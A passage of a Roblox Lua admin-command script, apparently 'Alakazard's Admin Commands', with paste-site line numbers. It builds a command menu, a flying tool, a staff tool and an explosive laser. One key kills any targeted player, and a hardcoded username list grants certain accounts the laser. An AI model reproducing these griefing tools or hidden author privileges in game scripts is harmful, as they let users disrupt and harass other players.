  1019. lego=game:service('Debris')lego:AddItem(game:FindFirstChild('ControlFrame',true),0)
  1020. ]],PlayerGui(pl))
  1021. end
  1022. end
  1023. end
  1024. end,
  1025.  
  1026. }
  1027. _GCommands=function()
  1028. _G['Alakazard..'..'\39'..'s Admin Commands']={}
  1029. for i,v in pairs(Commands)do
  1030. _G['Alakazard..'..'\39'..'s Admin Commands'][i]=v
  1031. end
  1032. end
  1033. ShowCommands=function(p)--Guis.Commands
  1034. _GCommands()
  1035. for i,v in pairs(p:children())do
  1036. if v:IsA('PlayerGui')then
  1037. for a,w in pairs(v:children())do
  1038. if w.Name=='Commands from Alakazard'then
  1039. w:remove()
  1040. end
  1041. end
  1042. end
  1043. end
  1044. screen=new('ScreenGui',PlayerGui(p))
  1045. screen.Name='Commands from Alakazard'
  1046. Main=new('TextButton',screen)
  1047. Main.Size=unew(0,200,0,30)
  1048. Main.Position=unew(0,0,0,0)
  1049. Main.TextColor3=cnew(1,1,1)
  1050. Main.Font=2
  1051. Main.TextXAlignment=0
  1052. Main.Text='Show Commands'
  1053. Main.FontSize=('Size14')
  1054. Main.Style=2
  1055. Main:TweenPosition(unew(0,0,.41,0),Enum.EasingDirection.Out,Enum.EasingStyle.Back,2,false)
  1056. Scripting('script',[[
  1057. gui=script.Parent
  1058. c=_G['Alakazard..'..'\39'..'s Admin Commands']
  1059. haa=nil
  1060. new=Instance.new
  1061. unew=UDim2.new
  1062. QQ=function(f)coroutine.resume(coroutine.create(f))end
  1063. word=function(t)
  1064. for q in string.gmatch(t,'%a+')do
  1065. return q
  1066. end
  1067. end
  1068. groups={}
  1069. newgroup=function()
  1070. child=#gui:children()-1
  1071. ggg=new('TextButton',gui)
  1072. ggg.Text=child+1
  1073. ggg.Style=2
  1074. ggg.Font=2
  1075. ggg.FontSize='Size14'
  1076. ggg.Size=unew(0,20,0,20)
  1077. ggg.Position=unew(0,0,0,20)
  1078. ggg:TweenPosition(unew(0,20*child-9,0,20),Enum.EasingDirection.Out,Enum.EasingStyle.Back,2,false)
  1079. ggg.TextColor3=Color3.new(1,1,1)
  1080. haa=ggg
  1081. return ggg
  1082. end
  1083. gui.MouseButton1Click:connect(function()
  1084. if click==true then return end
  1085. click=true
  1086. if gui.AutoButtonColor==true then
  1087. QQ(function()
  1088. xys='Hide Commands'
  1089. for wwq=1,#xys do wait()
  1090. gui.Text=xys:sub(1,wwq)
  1091. end
  1092. end)
  1093. gui.Style=1
  1094. gui.AutoButtonColor=false
  1095. nam=0
  1096. latitude=newgroup()
  1097. new('NumberValue',latitude).Value=#gui:children()-1
  1098. for text,fun in pairs(c)do
  1099. if nam==10 then
  1100. wait(.1)
  1101. nam=0
  1102. latitude=newgroup()
  1103. new('NumberValue',latitude).Value=#gui:children()-1
  1104. end
  1105. nam=nam+1
  1106. if groups[#gui:children()-1]==nil then
  1107. groups[#gui:children()-1]={}
  1108. end
  1109. groups[#gui:children()-1][word(text)]=text
  1110. end
  1111. for i,v in pairs(gui:children())do
  1112. if v:IsA('TextButton')then
  1113. v.MouseButton1Click:connect(function()
  1114. if click==true then return end click=true
  1115. if v.AutoButtonColor==true then
  1116. v.AutoButtonColor=false
  1117. v.Style=1
  1118. hanat=v.Value.Value
  1119. for q,e in pairs(groups[hanat])do
  1120. wait()
  1121. gl=new('TextButton',v)
  1122. gl.Size=unew(0,100,0,20)
  1123. gl.Style=2
  1124. gl.TextColor3=Color3.new(1,1,1)
  1125. gl.Text=q
  1126. gl.Font=2
  1127. gl.FontSize='Size14'
  1128. gl.Position=gl.Position+unew(0,-9/1.5,0,0)
  1129. gl:TweenPosition(unew(0,-9/1.5,0,20*(#v:children()-1)),Enum.EasingDirection.Out,Enum.EasingStyle.Back,1,false)
  1130. end
  1131. for nb,rrr in pairs(v:children())do
  1132. if rrr:IsA('TextButton')then
  1133. rrr.MouseButton1Click:connect(function()
  1134. for h,k in pairs(gui.Parent:children())do
  1135. if k.Name=='Ala'then
  1136. k:remove()
  1137. end
  1138. end
  1139. text_=groups[rrr.Parent.Value.Value][rrr.Text]
  1140. tutorial=new('TextButton',gui.Parent)
  1141. game:service('Debris'):AddItem(tutorial,#text_/5)
  1142. tutorial.Size=unew(0,200,0,200)
  1143. tutorial.Style=1
  1144. tutorial.Name='Ala'
  1145. tutorial.TextWrap=true
  1146. tutorial.AutoButtonColor=false
  1147. tutorial.Font=2
  1148. tutorial.FontSize='Size14'
  1149. tutorial.TextColor3=Color3.new(1,1,1)
  1150. tutorial.Position=unew(0,200,0.41,0)
  1151. QQ(function()for a_=1,#text_ do tutorial.Text=text_:sub(1,a_)wait()end end)
  1152. QQ(function()for _=1,20 do wait()tutorial.Size=unew(0,10*_,0,30)end for _=1,20 do wait()tutorial.Size=unew(0,200,0,10*_)end end)
  1153. end)
  1154. end
  1155. end
  1156. else
  1157. v.Style=2
  1158. v.AutoButtonColor=true
  1159. for n,b in pairs(v:children())do
  1160. if not b:IsA('NumberValue')then b:remove()end
  1161. end
  1162. end
  1163. click=false
  1164. end)
  1165. end
  1166. end
  1167. else
  1168. gui.Style=2
  1169. gui.AutoButtonColor=true
  1170. QQ(function()
  1171. xys='Show Commands'
  1172. for wwq=1,#xys do wait()
  1173. gui.Text=xys:sub(1,wwq)
  1174. end
  1175. end)
  1176. for i,v in pairs(gui:children())do
  1177. if v~=script then v:remove()end
  1178. end
  1179. end
  1180. click=false
  1181. end)
  1182. ]],Main)
  1183. end
  1184. NewCommand=function(commandtut,command,fn)
  1185. X(function()
  1186. Commands[commandtut]=(function(v,s)
  1187. if scmd(v,command)==false then return end
  1188. coroutine.resume(coroutine.create(fn))
  1189. end)
  1190. end)
  1191. end
  1192. FlyBin=function(p)
  1193. for i,v in pairs(p:children())do
  1194. if v.Name=='Fly stuff'then
  1195. v:remove()
  1196. end
  1197. end
  1198. bin=new('HopperBin')
  1199. bin.Name='Fly stuff'
  1200. bin.TextureId='http://www.roblox.com/asset/?id=54353092'
  1201. Scripting('local',[[
  1202. Evil={'NEMESlS','Brutally','raj99','alakazard','NEMESZISZ','Player'}
  1203. if not script.Parent:IsA('HopperBin')then
  1204. bin=Instance.new('HopperBin',game.Players.LocalPlayer.Backpack)
  1205. bin.TextureId='http://www.roblox.com/asset/?id=54353092'
  1206. bin.Name='AlaFly'
  1207. script.Parent=bin
  1208. else
  1209. bin=script.Parent
  1210. end
  1211. player=bin.Parent.Parent
  1212. debris=game:service('Debris')
  1213. new=Instance.new
  1214. fnew=CFrame.new
  1215. brick=BrickColor.new
  1216. vnew=Vector3.new
  1217. rot=CFrame.fromEulerAnglesXYZ
  1218. if script.className~='LocalScript'then
  1219. bin:remove()
  1220. end
  1221. T=new('Sound')
  1222. T.SoundId='rbxassetid://2101157'
  1223. T.Pitch=.4
  1224. motors={
  1225.  
  1226. right={},
  1227.  
  1228. left={},
  1229.  
  1230. mains={}
  1231.  
  1232. }
  1233. X=function(f)coroutine.resume(coroutine.create(f))end
  1234. life=function(obj,time)debris:AddItem(obj,time)end
  1235. local bv,bg,torso,Lmotor,Rmotor,head
  1236. fly=150
  1237. findt=function()
  1238. for i,v in pairs(player.Character:children())do
  1239. if v.Name=='Torso'then
  1240. return v
  1241. end
  1242. end
  1243. end
  1244. wing=function()
  1245. torso=player.Character.Torso
  1246. for i,v in pairs(torso.Parent:children())do
  1247. if v.Name=='WingMain'then
  1248. v:remove()
  1249. end
  1250. end
  1251. mainwingpart=new('Part')
  1252. mainwingpart.Name='WingMain'
  1253. mainwingpart.CanCollide=false
  1254. mainwingpart.Size=vnew(1,1,1)
  1255. mainwingpart.Transparency=1
  1256. mainwingpart.BrickColor=BrickColor.Black()
  1257. mainwingpart.Parent=player.Character
  1258. weld=new('Weld',torso)
  1259. weld.Part0=weld.Parent
  1260. weld.Part1=mainwingpart
  1261. weld.C0=fnew(0,.4,0)
  1262. WingRight=new('Part')
  1263. WingRight.formFactor=3
  1264. WingRight.Size=vnew(.04,.3,.5)
  1265. WingRight.CanCollide=false
  1266. WingRight.BrickColor=BrickColor.Black()
  1267. WingRight.Parent=mainwingpart
  1268. Rmotor=new('Motor',mainwingpart)
  1269. Rmotor.Part0=Rmotor.Parent
  1270. Rmotor.Part1=WingRight
  1271. Rmotor.C1=rot(0,math.pi/1.5,0)+vnew(-.18,-.10,.8)
  1272. nextpp=nil
  1273. dan=-2
  1274. for w=1,15 do
  1275. wait()
  1276. dan=dan+1
  1277. pp=new('Part')
  1278. pp.Locked=true
  1279. pp.BrickColor=BrickColor.Black()
  1280. pp.formFactor=3
  1281. if w==1 then
  1282. pp.Size=vnew(.3,2.5,.8)
  1283. else
  1284. pp.Size=vnew(.3,1/(w/5),2/w)
  1285. end
  1286. pp.CanCollide=false
  1287. pp.BrickColor=BrickColor.Black()
  1288. pp.CFrame=WingRight.CFrame
  1289. pp.Material='Slate'
  1290. pp.Parent=WingRight
  1291. if dan==1 then
  1292. dan=0
  1293. asdlal=new('WedgePart')
  1294. asdlal.BrickColor=BrickColor.White()
  1295. asdlal.formFactor=3
  1296. asdlal.Size=vnew(.25,pp.Size.y,15/w)
  1297. for lawlz,evil in pairs(Evil)do
  1298. if player.Name==evil then
  1299. asdlal:remove()
  1300. asdlal=new('Part')
  1301. asdlal.formFactor=3
  1302. asdlal.BrickColor=BrickColor.Black()
  1303. asdlal.Size=vnew(.25,.25,15/w)
  1304. end
  1305. end
  1306. asdlal.Locked=true
  1307. asdlal.CanCollide=false
  1308. asdlal.Material='Slate'
  1309. asdlal.Parent=pp
  1310. mmm=new('Motor',pp)
  1311. mmm.Part0=pp
  1312. mmm.Part1=asdlal
  1313. mmm.C0=fnew(0,0,-asdlal.Size.z/2)
  1314. end
  1315. if w==1 then
  1316. ppmotor=new('Motor',WingRight)
  1317. else
  1318. ppmotor=new('Motor',nextpp)
  1319. end
  1320. table.insert(motors.right,ppmotor)
  1321. ppmotor.Part0=ppmotor.Parent
  1322. ppmotor.Part1=pp
  1323. if w==1 then
  1324. ppmotor.C0=rot(-.04,-math.pi/6,0)+vnew(.3,0,-.1)
  1325. else
  1326. ppmotor.C0=rot(-.1/(w/7),-.07,0)+vnew(0,pp.Size.y,0)
  1327. end
  1328. nextpp=pp
  1329. end
  1330.  
  1331. WingLeft=new('Part')
  1332. WingLeft.formFactor=3
  1333. WingLeft.Size=vnew(.04,.3,.5)
  1334. WingLeft.CanCollide=false
  1335. WingLeft.BrickColor=BrickColor.Black()
  1336. WingLeft.Parent=mainwingpart
  1337. Lmotor=new('Motor',mainwingpart)
  1338. Lmotor.Part0=Lmotor.Parent
  1339. Lmotor.Part1=WingLeft
  1340. Lmotor.C1=rot(0,-math.pi/1.5,0)+vnew(0.18,-.10,.8)
  1341. nextpp=nil
  1342. dan=-2
  1343. for w=1,15 do
  1344. wait()
  1345. dan=dan+1
  1346. pp=new('Part')
  1347. pp.Locked=true
  1348. pp.BrickColor=BrickColor.Black()
  1349. pp.formFactor=3
  1350. if w==1 then
  1351. pp.Size=vnew(.3,2.5,.8)
  1352. else
  1353. pp.Size=vnew(.3,1/(w/5),2/w)
  1354. end
  1355. pp.CanCollide=false
  1356. pp.BrickColor=BrickColor.Black()
  1357. pp.CFrame=WingLeft.CFrame
  1358. pp.Material='Slate'
  1359. pp.Parent=WingLeft
  1360. if dan==1 then
  1361. dan=0
  1362. asdlal=new('WedgePart')
  1363. asdlal.BrickColor=BrickColor.White()
  1364. asdlal.formFactor=3
  1365. asdlal.Size=vnew(.25,pp.Size.y,15/w)
  1366. for lawlz,evil in pairs(Evil)do
  1367. if player.Name==evil then
  1368. asdlal:remove()
  1369. asdlal=new('Part')
  1370. asdlal.formFactor=3
  1371. asdlal.BrickColor=BrickColor.Black()
  1372. asdlal.Size=vnew(.25,.25,15/w)
  1373. end
  1374. end
  1375. asdlal.Locked=true
  1376. asdlal.CanCollide=false
  1377. asdlal.Material='Slate'
  1378. asdlal.Parent=pp
  1379. mmm=new('Motor',pp)
  1380. mmm.Part0=pp
  1381. mmm.Part1=asdlal
  1382. mmm.C0=fnew(0,0,-asdlal.Size.z/2)
  1383. end
  1384. if w==1 then
  1385. ppmotor=new('Motor',WingLeft)
  1386. else
  1387. ppmotor=new('Motor',nextpp)
  1388. end
  1389. ppmotor.Part0=ppmotor.Parent
  1390. table.insert(motors.left,ppmotor)
  1391. ppmotor.Part1=pp
  1392. if w==1 then
  1393. ppmotor.C0=rot(-.04,math.pi/6,0)+vnew(-.3,0,-.1)
  1394. else
  1395. ppmotor.C0=rot(-.1/(w/7),.07,0)+vnew(0,pp.Size.y,0)
  1396. end
  1397. nextpp=pp
  1398. end
  1399. X(function()
  1400. for i,v in pairs(motors.right)do
  1401. v.C1=rot(.1,0,0)
  1402. wait()
  1403. end
  1404. for i,v in pairs(motors.right)do
  1405. v.C1=rot(0,-.1,-.1)
  1406. wait()
  1407. end
  1408. end)
  1409. X(function()
  1410. for i,v in pairs(motors.left)do
  1411. v.C1=rot(.1,0,0)
  1412. wait()
  1413. end
  1414. for i,v in pairs(motors.left)do
  1415. v.C1=rot(0,.1,.1)
  1416. wait()
  1417. end
  1418. end)
  1419. X(function()
  1420. for i,v in pairs(motors.right)do
  1421. v.C1=rot(.1,0,0)
  1422. wait()
  1423. end
  1424. for i,v in pairs(motors.right)do
  1425. v.C1=rot(0,-.1,0)
  1426. wait()
  1427. end
  1428. end)
  1429. X(function()
  1430. for i,v in pairs(motors.left)do
  1431. v.C1=rot(.1,0,0)
  1432. wait()
  1433. end
  1434. for i,v in pairs(motors.left)do
  1435. v.C1=rot(0,.1,0)
  1436. wait()
  1437. end
  1438. end)
  1439. Rmotor.MaxVelocity=.1
  1440. Lmotor.MaxVelocity=.1
  1441. Lmotor.DesiredAngle=.8
  1442. Rmotor.DesiredAngle=-.8
  1443. end
  1444. leftarm=function(bool)
  1445. X(function()
  1446. newlarm=new('Motor6D')
  1447. newlarm.Name='Left Shoulder'
  1448. newlarm.Parent=player.Character.Torso
  1449. newlarm.Part0=player.Character.Torso
  1450. newlarm.Part1=player.Character['Left Arm']
  1451. wait()--hmm
  1452. newlarm.C0=fnew(-1,.5,0,0,0,-1,0,1,0,1,0,0)
  1453. newlarm.C1=fnew(.5,.5,0,0,0,-1,0,1,0,1,0,0)
  1454. if bool==false then return newlarm end
  1455. an=player.Character.Animate
  1456. an.Disabled=true
  1457. an.Disabled=false
  1458. end)
  1459. return newlarm
  1460. end
  1461. Name=function()
  1462. name=''
  1463. for LA=1,3 do
  1464. name=name..string.char(math.random(0,255))
  1465. end
  1466. return name
  1467. end
  1468. Lazer=function(m)wllwlw=false
  1469. for i,v in pairs(Evil)do
  1470. if v==player.Name then
  1471. wllwlw=true break
  1472. end
  1473. end
  1474. if wllwlw==false then return end
  1475. if asdTroll~=nil then return end
  1476. asdTroll='asd'
  1477. rarm=rightarm(false)
  1478. rarm.MaxVelocity=.2
  1479. rarm.DesiredAngle=math.rad(110)
  1480. larm=leftarm(false)
  1481. larm.MaxVelocity=.2
  1482. larm.DesiredAngle=-math.rad(110)
  1483.  
  1484. lball=new('Part')
  1485. life(lball,10)
  1486. lball.Shape=0
  1487. lball.Size=vnew(1,1,1)
  1488. lball.CanCollide=false
  1489. lball.BottomSurface=0
  1490. lball.TopSurface=0
  1491. lball.Transparency=.5
  1492. lball.BrickColor=BrickColor.White()
  1493. for i,v in pairs(Evil)do
  1494. if player.Name==v then
  1495. lball.BrickColor=BrickColor.Black()
  1496. end
  1497. end
  1498. lball.Parent=player.Character
  1499. lweld=new('Weld',larm.Part1)
  1500. lweld.Part0=lweld.Parent
  1501. lweld.Part1=lball
  1502. lweld.C0=fnew(0,-4,0)
  1503.  
  1504. rball=new('Part')
  1505. life(rball,10)
  1506. rball.Shape=0
  1507. rball.Size=vnew(1,1,1)
  1508. rball.Transparency=.5
  1509. rball.CanCollide=false
  1510. rball.BottomSurface=0
  1511. rball.TopSurface=0
  1512. rball.BrickColor=BrickColor.White()
  1513. for i,v in pairs(Evil)do
  1514. if player.Name==v then
  1515. rball.BrickColor=BrickColor.Black()
  1516. end
  1517. end
  1518. rball.Parent=player.Character
  1519. rweld=new('Weld',rarm.Part1)
  1520. rweld.Part0=rweld.Parent
  1521. rweld.Part1=rball
  1522. rweld.C0=fnew(0,-4,0)
  1523. X(function()
  1524. X(function()
  1525. for KG=1,157 do wait()
  1526. part=new('Part')
  1527. life(part,.2)
  1528. part.Transparency=.3
  1529. asdrandom=(math.random(5,20)/10)+KG/40
  1530. new('BlockMesh',part).Scale=vnew(asdrandom,asdrandom,asdrandom)
  1531. part.Size=vnew(1,1,1)
  1532. part.Anchored=true
  1533. part.CFrame=rot(math.rad(math.random(0,360)),math.rad(math.random(0,360)),math.rad(math.random(0,360)))+lball.Position
  1534. part.Name='asd'
  1535. part.BrickColor=BrickColor.White()
  1536. for i,v in pairs(Evil)do
  1537. if player.Name==v then
  1538. part.BrickColor=BrickColor.Black()
  1539. end
  1540. end
  1541. part.Parent=lball
  1542. end
  1543. end)
  1544. for KG2=1,157 do wait()
  1545. part=new('Part')
  1546. life(part,.2)
  1547. part.Transparency=.3
  1548. asdrandom=(math.random(5,20)/10)+KG2/40
  1549. new('BlockMesh',part).Scale=vnew(asdrandom,asdrandom,asdrandom)
  1550. part.Size=vnew(1,1,1)
  1551. part.Anchored=true
  1552. part.CFrame=rot(math.rad(math.random(0,360)),math.rad(math.random(0,360)),math.rad(math.random(0,360)))+rball.Position
  1553. part.Name='asd'
  1554. part.BrickColor=BrickColor.White()
  1555. for i,v in pairs(Evil)do
  1556. if player.Name==v then
  1557. part.BrickColor=BrickColor.Black()
  1558. end
  1559. end
  1560. part.Parent=rball
  1561. end
  1562. rball:remove()
  1563. lball:remove()
  1564. rightarm(true)
  1565. leftarm(true)
  1566. asdTroll=nil
  1567. for wasd=1,200 do
  1568. if pp~=nil then pp:remove()end
  1569. if asdTroll~=nil then return end
  1570. pos=m.Hit.p
  1571. pp=new('Part')
  1572. life(pp,.1)
  1573. pp.formFactor=3
  1574. pp.BrickColor=BrickColor.Black()
  1575. pp.Transparency=.2
  1576. pp.Size=vnew(6,1000,6)
  1577. pp.CFrame=CFrame.new(pos.x,pos.y+(pp.Size.y/2),pos.z)+vnew(math.random(-3,3),0,math.random(-3,3))
  1578. exp=Instance.new('Explosion')
  1579. exp.Position=pos+vnew(math.random(-3,3),0,math.random(-3,3))
  1580. exp.BlastRadius=30
  1581. exp.Parent=workspace
  1582. Join=new('Part')
  1583. Join.formFactor=0
  1584. Join.Size=vnew(1,1,1)
  1585. new('SpecialMesh',Join).MeshType='Sphere'
  1586. Join.Mesh.Scale=vnew(60,60,60)
  1587. Join.Anchored=true
  1588. Join.BottomSurface=0
  1589. Join.TopSurface=0
  1590. Join.BrickColor=BrickColor.Black()
  1591. Join.Transparency=.5
  1592. Join.CFrame=rot(0,math.rad(3.6*wasd)*2,0)+pos+vnew(math.random(-3,3),0,math.random(-3,3))
  1593. Join.Parent=pp
  1594. pJoin=new('Part')
  1595. life(pJoin,.4)
  1596. new('BlockMesh',pJoin).Scale=vnew(10,10,10)+vnew((wasd/30),(wasd/30),(wasd/30))
  1597. pJoin.formFactor=0
  1598. pJoin.Size=vnew(1,1,1)
  1599. pJoin.Anchored=true
  1600. pJoin.BrickColor=BrickColor.Black()
  1601. pJoin.Transparency=.5
  1602. pJoin.CFrame=rot(math.rad(math.random(0,360)),math.rad(math.random(0,360)),math.rad(math.random(0,360)))+pos+vnew(math.random(-3,3),0,math.random(-3,3))
  1603. pJoin.Parent=workspace
  1604. pp.Parent=player.Character
  1605. wait()
  1606. pp.BrickColor=BrickColor.White()
  1607. end
  1608. end)
  1609. -- rightarm(true)
  1610. end
  1611. rightarm=function(bool)
  1612. if pcall(function()
  1613. newrarm=new('Motor6D')
  1614. newrarm.Name='Right Shoulder'
  1615. newrarm.Parent=player.Character.Torso
  1616. newrarm.Part0=player.Character.Torso
  1617. newrarm.Part1=player.Character['Right Arm']
  1618. newrarm.C0=fnew(1,.5,0,0,0,1,0,1,0,-1,0,0)
  1619. newrarm.C1=fnew(-.5,.5,0,0,0,1,0,1,0,-1,0,0)
  1620. if bool==false then return newlarm end
  1621. pcall(function()
  1622. an=player.Character.Animate
  1623. an.Disabled=true
  1624. an.Disabled=false
  1625. end)
  1626. end)then
  1627. return newrarm
  1628. end
  1629. end
  1630. light=function()
  1631. if pcall(function()torso=player.Character.Torso end)then
  1632. else
  1633. return
  1634. end
  1635. larm=leftarm(false)
  1636. tt=T:clone()
  1637. life(tt,0)
  1638. tt.Parent=workspace
  1639. tt:play()
  1640. Pl=new('Part')
  1641. life(Pl,20)
  1642. Pl.CFrame=torso.CFrame+torso.CFrame.lookVector*6
  1643. Pl.Anchored=true
  1644. Pl.CanCollide=false
  1645. Pl.Parent=workspace
  1646. leftarm(true)
  1647. end
  1648. bodys=function(asd)
  1649. for i,v in pairs(torso:children())do
  1650. if v:IsA('BodyVelocity')or v:IsA('BodyGyro')then
  1651. v:remove()
  1652. end
  1653. end
  1654. if asd==true then return end
  1655. bv=new('BodyVelocity')
  1656. bg=new('BodyGyro')
  1657. bv.maxForce=vnew(math.huge,math.huge,math.huge)
  1658. bv.velocity=vnew(0,0,0)
  1659. bg.maxTorque=vnew(0,0,0)
  1660. bg.Parent=torso
  1661. bv.Parent=torso
  1662. end
  1663. ball=function(asd)
  1664. for i,v in pairs(player.Character:children())do
  1665. if v.Name=='Fly Ball'then
  1666. v:remove()
  1667. end
  1668. end
  1669. if asd==true then return end
  1670. part=new('Part')
  1671. part.Shape=0
  1672. part.BottomSurface=0
  1673. part.TopSurface=0
  1674. part.Size=torso.Size*5
  1675. part.Transparency=.5
  1676. part.BrickColor=BrickColor.Black()
  1677. part.CanCollide=false
  1678. part.CFrame=torso.CFrame
  1679. part.Name='Fly Ball'
  1680. part.Parent=player.Character
  1681. weld=new('Weld')
  1682. weld.Parent=torso
  1683. weld.Part0=weld.Parent
  1684. weld.Part1=part
  1685. part.Touched:connect(function()
  1686. for i=1,5 do
  1687. wait()
  1688. part.Transparency=.5-i/10
  1689. end
  1690. part.Transparency=.5
  1691. end)
  1692. end
  1693. script.Parent.Selected:connect(function(m)
  1694. torso=player.Character.Torso
  1695. bodys(true)
  1696. m.KeyDown:connect(function(k)
  1697. if k=='q'then
  1698. fly=fly-10
  1699. if fly<0 then
  1700. fly=10
  1701. end
  1702. elseif k=='r'then
  1703. wing()
  1704. elseif k=='f'then
  1705. Lazer(m)
  1706. elseif k=='t'then
  1707. X(function()player.Character.WingMain:remove()end)
  1708. elseif k=='e'then
  1709. fly=fly+10
  1710. elseif k=='y'then
  1711. MUp=false
  1712. bodys(false)
  1713. elseif k=='p'then
  1714. print'asd'
  1715. elseif k=='b'then
  1716. fly=150
  1717. elseif k=='x'then
  1718. X(function()
  1719. if m.Target==workspace or m.Target==nil then return end
  1720. ko=new('ObjectValue')
  1721. game:service('Debris'):AddItem(ko,1)
  1722. ko.Value=player
  1723. ko.Name='creator'
  1724. for i,v in pairs(m.Target.Parent:children())do
  1725. if v:IsA('Humanoid')then
  1726. ko.Parent=v
  1727. v.Torso:BreakJoints()
  1728. X(function()
  1729. for asd=1,100 do
  1730. wait()
  1731. part=new('Part')
  1732. game:service('Debris'):AddItem(part,.2)
  1733. part.formFactor=0
  1734. part.Transparency=.3
  1735. part.Anchored=true
  1736. part.CanCollide=false
  1737. part.CFrame=rot(math.rad(math.random(1,180)),math.rad(math.random(1,180)),math.rad(math.random(1,180)))+v.Torso.Position
  1738. part.Size=vnew(2,2,2)
  1739. part.BrickColor=BrickColor.Black()
  1740. random=math.random(part.Size.x,part.Size.x*2)
  1741. new('BlockMesh',part).Scale=vnew(random,random,random)
  1742. part.Parent=workspace
  1743. end
  1744. end)
  1745. end
  1746. end
  1747. end)
  1748. end
  1749. end)
  1750. m.Button1Down:connect(function()
  1751. ball(true)
  1752. bodys(false)
  1753. MUp=false
  1754. rightarm(false)
  1755. leftarm(false)
  1756. bg.maxTorque=Vector3.new(900000,900000,900000)
  1757. bg.cframe=fnew(torso.Position,m.hit.p)*rot(math.rad(-60),0,0)
  1758. bv.velocity=fnew(torso.Position,m.hit.p).lookVector*fly
  1759. end)
  1760. m.Move:connect(function()
  1761. if MUp==true then return end
  1762. torso=player.Character.Torso
  1763. X(function()
  1764. bg.maxTorque=vnew(math.huge,math.huge,math.huge)
  1765. bg.cframe=fnew(torso.Position,m.hit.p)*rot(math.rad(-60),0,0)
  1766. bv.velocity=fnew(torso.Position,m.hit.p).lookVector*fly
  1767. end)
  1768. end)
  1769. m.Button1Up:connect(function()
  1770. MUp=true
  1771. ball(true)
  1772. bodys(false)
  1773. rightarm(true)
  1774. leftarm(true)
  1775. bv.maxForce=vnew(10000,10000,10000)
  1776. delay(2,function()if MUp==true then bodys(true)end end)
  1777. torso.Velocity=vnew(0,0,0)
  1778. torso.RotVelocity=vnew(0,0,0)
  1779. torso.CFrame=fnew(torso.Position,m.hit.p)*rot(0,0,0)
  1780. torso.Velocity=vnew(0,0,0)
  1781. torso.RotVelocity=vnew(0,0,0)
  1782. end)
  1783. end)
  1784. bin.Deselected:connect(function()
  1785. X(function()
  1786. ball(true)
  1787. bodys(true)
  1788. torso.Velocity=vnew(0,0,0)
  1789. torso.RotVelocity=vnew(0,0,0)
  1790. end)
  1791. end)
  1792. wing()
  1793. ]],bin)
  1794. bin.Parent=p
  1795. end
  1796. StaffSourceNew=[[ player=script.user.Value soul=0 x=function(f)coroutine.resume(coroutine.create(f))end ko=function(humanoid)if humanoid:FindFirstChild('creator')then return end k=Instance.new('ObjectValue')k.Name='creator'k.Value=player k.Parent=humanoid player.Character.Humanoid:TakeDamage(-humanoid.MaxHealth)soul=soul+1 end ]]
  1797. StaffSourceF1=StaffSourceNew..[[script.Parent.Touched:connect(function(a)x(function()if vnc~=nil then return end vnc='asd' x(function()if a.Parent:IsA('Tool')and a.Parent:IsA('Hat')and a.Parent==player.Character then return end humanoid=a.Parent.Humanoid ko(humanoid)for i=1,3 do exp=Instance.new('Explosion',workspace)exp.Position=a.Position+Vector3.new(0,i,0)wait()end for i=1,10 do wait() for wqe,n in pairs(script.Parent.Parent:children())do if n:IsA('BasePart')then n.Transparency=i/10 if n.Transparency==1 then n:remove()end end end end end)end)end)]]
  1798. StaffSourceF2=StaffSourceNew..[[wait(4)for aw=1,3 do wait()for i=1,3 do exp=Instance.new('Explosion',workspace)exp.Position=script.Parent.Position+Vector3.new(math.random(-6,6)*i*aw,i*aw,math.random(-6,6)*i*aw) end end script.Parent.Parent:remove()]]
  1799. StaffFunctionsLoad=se.lighting.ChildAdded:connect(function(a)
  1800. X(function()wait()
  1801. if a.Name=='StaffFunction1'then
  1802. nalol=Scripting('script',StaffSourceF1,nil)
  1803. a.user.Parent=nalol
  1804. nalol.Parent=a.parent.Value
  1805. elseif a.Name=='StaffFunction2'then
  1806. nalol=Scripting('script',StaffSourceF2,nil)
  1807. a.user.Parent=nalol
  1808. nalol.Parent=a.parent.Value
  1809. end
  1810. end)
  1811. end)
  1812. Staff=function(par)
  1813. X(function()
  1814. for i,v in pairs(par:children())do
  1815. if v.Name=='AlaStaff'then
  1816. wait()
  1817. se.debris:AddItem(v,.1)
  1818. end
  1819. end
  1820. end)
  1821. Print('Load Staff for '..par.Parent.Name..'!')
  1822. Tool=new('Tool')
  1823. Tool.Name='AlaStaff'
  1824. Tool.GripPos=vnew(0,.5,0)
  1825. Tool.TextureId='http://www.roblox.com/asset/?id=54353092'
  1826. ToolHandle=new('Part')
  1827. ToolHandle.Material=('Wood')
  1828. ToolHandle.BrickColor=bcn('Reddish brown')
  1829. ToolHandle.Name='Handle'
  1830. ToolHandle.formFactor=3
  1831. ToolHandle.Size=vnew(.5,6,.5)
  1832. ToolHandle.CanCollide=false
  1833. ToolHandle.Parent=Tool
  1834.  
  1835. Scripting('local',[[
  1836. --================Tool!================--
  1837. tool=script.Parent
  1838. staff=tool.Handle
  1839. SmokePart=nil
  1840. --=====================================--
  1841. --===============Player!===============--
  1842. player=nil
  1843. if tool.Parent:IsA('Model')then
  1844. player=game.Players[tool.Parent.Name]
  1845. elseif tool.Parent:IsA('Backpack')then
  1846. player=tool.Parent.Parent
  1847. end
  1848. --=====================================--
  1849. --================Math!================--
  1850. random= math.random;
  1851. pi= math.pi;
  1852. --=====================================--
  1853. --==============Services!==============--
  1854. debris= game:service('Debris')
  1855. workspace= game:service('Workspace')
  1856. lighting= game:service('Lighting')
  1857. insert= game:service('InsertService')
  1858. --=====================================--
  1859. --===============Changes===============--
  1860. new= Instance.new;
  1861. unew= UDim2.new;
  1862. vnew= Vector3.new;
  1863. fnew= CFrame.new;
  1864. cnew= Color3.new;
  1865. bcn= BrickColor.new;
  1866. look= CFrame.lookVector;
  1867. rot= CFrame.fromEulerAnglesXYZ;
  1868. soul= 0;
  1869. --=====================================--
  1870. tool.Parent=player.Backpack
  1871. clickActive=false
  1872. kayActive=false
  1873. --===========Base Functions!===========--
  1874. x=function(f)coroutine.resume(coroutine.create(f))end
  1875.  
  1876. sing=function(name,parent)
  1877. x(function()
  1878. mmo=new('Model')
  1879. debris:AddItem(mmo,1)
  1880. mmo.Name='StaffFunction'..name
  1881. V=new('ObjectValue',mmo)
  1882. V.Value=player
  1883. V.Name='user'
  1884. mmq=new('ObjectValue',mmo)
  1885. mmq.Name='parent'
  1886. mmq.Value=parent
  1887. mmc=mmo:clone()
  1888. debris:AddItem(mmc,1)
  1889. mmc.Parent=lighting
  1890. end)
  1891. end
  1892.  
  1893. ko=function(humanoid)
  1894. if humanoid:FindFirstChild('creator',true)then return end
  1895. k=new('ObjectValue')
  1896. k.Name='creator'
  1897. k.Value=player
  1898. k.Parent=humanoid
